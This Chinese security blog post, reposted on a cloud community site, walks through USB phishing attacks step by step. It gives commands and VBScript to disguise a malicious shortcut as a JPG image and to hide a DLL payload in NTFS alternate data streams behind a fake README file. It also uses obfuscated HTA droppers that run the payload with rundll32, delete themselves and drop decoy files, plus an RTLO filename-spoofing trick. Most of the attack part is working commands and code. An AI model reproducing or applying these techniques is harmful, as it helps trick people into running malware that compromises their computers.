专栏首页重生信息安全USB钓鱼几种方式总结。

USB钓鱼几种方式总结。

方式一:引诱目标点开“美图”

当目标点开美图(恶意LNK快捷方式文件:confidential.jpg.lnk),使目标认为他正在打开图像(confidential.jpg),HTA dropper 隐藏在快捷方式文件中。LNK将执行HTA,HTA将依次执行并删除的DLL payload,并且用诱饵图片替换快捷方式(confidential.jpg)。过程如下:

利用过程如下:

1.MSF生成dll payload,这里用TheFatRat快速生成:

2.用macro_pack生成一个经过混淆的HTA payload,他将会执行并删除dll

echo DllMain | macro_pack.exe --template=EMBED_DLL --embed=dll_payload.dll --obfuscate -G payload.hta

EMBED_DLL模板将创建一个VB代码,该代码将加载并删除“-embed”指定的文件,并用rundll32加载;-G是指生成hta文件

3.同样用macro_pack生成另外一个经过混淆的HTA payload,他将完成替换删除.lnk的功能。当我们将其放置于恶意LNK在同一文件夹下。运行后将替换.lnk,释放“美图”

echo "wuyifan.jpg" | macro_pack.exe -t EMBED_EXE --embed=wuyifan.jpg -o -G pic.hta

如果你此时双击pic.hta,会生成wuyifan.jpg,但是此时pic.hta没有自删除

4.整合上述的两步形成一个自删除的HTA文件:打开pic.hta将AutoOpen函数名修改为AutoOpen2

删除payload.hta的vb代码的后两行(AutoOpen和Close),将pic.hta中的vb代码(除了最后两行AutoOpen和Close)复制到payload.hta的vb脚本末尾,后并添加以下代码:

AutoOpen2
AutoOpen
Set objFSO = CreateObject( "Scripting.FileSystemObject" )
Set WshShell = CreateObject("WScript.Shell")
objFSO.DeleteFile window.document.location.pathname
Close
 

现在运行payload.hta将运行dll,生成wuyifan.jpg并自删除

5.将payload.hta嵌入到.lnk文件中,我们希望它能用mshta.exe来解析从而触发payload,如运行一下命令:

%windir%\system32\cmd.exe /c start "" "mshta" "%CD%\confidential.jpg.lnk"

当payload构成放在USB中,我们需要知道当前路径,%cd%将提供当前的路径名称

使用macro_pack生成lnk,这里U盘的盘符为”F:”,运行一下命令生成lnk:

macro_pack.exe -G G:\confidential.jpg.lnk

* 当提示输入”Shortcut_Target”时输入我们需要打开link运行的命令:

%windir%\system32\cmd.exe /c start "" "mshta" "%CD%\wuyifan.jpg.lnk"

* 当提示输入”Shortcut_Icon”时输入:

%windir%\system32\imageres.dll,67

这里主要是为了保证lnk的图标为JPG图像的图标,和imageres.dll中67位索引相对应

6.将.lnk和payload.hta合并到一起就OK了,运行:

copy /b F:\wuyifan.jpg.lnk+payload.hta F:\wuyifan.jpg.lnk

运行效果见:USB_lnk.gif

说明:

当在USB中双击wuyifan.jpg.lnk,会触发payload,加载DLL并隐藏到%TEMP%\Document1.asd中,加载payload的方式为:

CreateObject("WScript.Shell").Run "%windir%\system32\rundll32.exe %temp%\Document1.asd,<<<DLL_FUNCTION>>>", 0

在任务管理器中会发现图片正使用taskmgr或者Sysinternals procexp运行,并且lnk文件被真实的图片替换,实例中USB文件运行的命令容易被杀软识别出来

方式二:针对”README.txt”文件

当目标打开README.txt时,实际上运行的是恶意的settingcontent-ms文件,文件结构准遵循XML模式,不能像上述方法与hta文件组合。我们将使用NTFS备用数据流来隐藏和运行dll payload

此settingcontent-ms文件将执行隐藏在备份数据流(README.txt.settingcontent-ms:R)中的DLL,并将以记事本运行存储在另一个ADS中的诱饵文本(README.txt.settingcontent-ms:T.txt),相比第一种方式它没有想.lnk或者.uri那样的快捷箭头

利用过程如下:

1.构建诱饵文本文件,当目标打开时显示文本

echo "Hello World!" > Text.txt

2. 构建恶意设置的快捷方式文件。使用macro_pack生成settingcontent-ms文件,例如要生成一个README.txt文档,该文档的启动运行calc.exe

echo 'C:\windows\system32\cmd.exe /c calc.exe' '.' |  macro_pack.exe -G README.txt.settingcontent-ms 

但是我们真正要启动的是隐藏在NTFS文件系统备份数据流中的DLL payload和诱饵文件。这里有个问题是setcontent-ms文件默认在“C:\Windows\System32”中打开,这样我们必须知道USB的盘符,为此使用Powershell的脚本如下:

%windir%\system32\cmd.exe /c powershell.exe $drive=(Get-WmiObject Win32_Volume -Filter "DriveType='2'").Name;Start-Process "notepad.exe" "$drive\README.txt.settingcontent-ms:T.txt"; Start-Process "control.exe" "$drive\README.txt.settingcontent-ms:R"

上述命令将调用wmi将盘符赋值给$drive变量;启动记事本打开诱惑文档README.txt.settingcontent-ms:T.txt;启动control.exe打开README.txt.settingcontent-ms:R中的DLL payload,其中DLL也可以同rundll32加载。将上述命令替换刚才生成calc命令,最终的README.txt.settingcontent-ms文件如下:

3. 创建备用数据流。去报USB已经使用NTFS文件系统格式化,当前USB的盘符为“F:”,创建ADS,README.txt.settingcontent-ms:R 包含DLL:

type dll_payload.dll > F:\README.txt.settingcontent-ms:R

READNE.txt.settingcontent-ms:T.txt 包含诱饵文本:

type Text.txt > F:\README.txt.settingcontent-ms:T.txt

使用streams命令可以检查创建的ADS流

PS:使用macro_pack生成RTLO翻转运行calc的hta文件,运行:

echo calc.exe | macro_pack.exe -t CMD -G calc.hta --unicode-rtlo=jpg

生成的文件名为calcath.jpg,实际上是calc[rtlo]gpj.hta,此方法也适用于其他操作系统,但是打开运行的程序可能不同

本文分享自微信公众号 - 重生信息安全(csxxaq),作者:T3ngYu

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2019-12-18

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 由浅入深的域渗透系列一(下)

    因为192.168.52.0/24段不能直接连接到192.168.33.3(kali地址),所以需要CS派生smb beacon。让内网的主机连接到win7上。

    重生信息安全
  • 看我如何模拟Cobalt Strike上线欺骗入侵者

    不知道你有没有遇到过马上线却不能操作的情况,我猜当你网络卡或马写得不好时会出现这个问题,但是人为的你可能没遇到过,首先要欺骗你的远控,得分析你的协议,如果你的马...

    重生信息安全
  • 什么是cryptojacking?如何防止,检测和从中恢复

    Cryptojacking是未经授权使用他人的计算机来窃取cryptocurrency。黑客通过让受害者单击电子邮件中的恶意链接来执行此操作,该电子邮件将加密代...

    重生信息安全
  • 一文让你完全弄懂Stegosaurus

    国内关于 Stegosaurus 的介绍少之又少,一般只是单纯的工具使用的讲解之类的,并且本人在学习过程中也是遇到了很多的问题,基于此种情况下写下此文,也是为我...

    Angel_Kitty
  • 图覆盖准则

    有了图,我们如何来覆盖它,需要一些规则。通常我们可以进一步去扩展,一个子图可以从这一个点可达,是指从这个点出发,我们存在这么一条路径,到达这个子图,这个概念叫...

    归根落叶
  • 能源行业巨变来了!能源区块链“能链”正式启动

    区块链已来,世界从此大不同 从富兰克林发现电力到十九世纪末交流电变压器出现,电网都被中心化的电力生产机制和长程输电基础设施主宰,造成了大量的冗电和线路损耗。近年...

    区块链领域
  • 科学瞎想系列之五十三 电流传感器(3)

    前面两期的瞎想宝宝们知道了电流互感器和分流器以其低廉的价格、优异的可靠性在电力系统和各种稳态检测场合得到了广泛应用。但它们也各自存在着先天的不足。互感器存在着瞬...

    标准答案
  • 清华学神MIT的最新研究:让AI学会了物理力学

    来源:量子位 作者:问耕 智能观 转载 机器能自行理解我们这个物理世界的基本规则么?答案是能。 多年以来,麻省理工学院(MIT)的研究人员一直在寻求解释和复制人...

    企鹅号小编
  • AI学会理解物理力学,机器像人更进一步 | 清华学神在MIT新研究

    问耕 发自 凹非寺 量子位 出品 | 公众号 QbitAI ? 机器能自行理解我们这个物理世界的基本规则么?答案是能。 多年以来,麻省理工学院(MIT)的研究人...

    量子位
  • 控制、生成、扩充:一个可伸缩的多属性文本生成框架(CS.CL)

    本文提出了一种基于多属性控制的文本生成方法。我们介绍了CGA,一个可变的自动编码器的架构,以控制,产生,并扩大文本。通过将对抗性学习与上下文感知损失相结合,CG...

    用户7236395

扫码关注云+社区

领取腾讯云代金券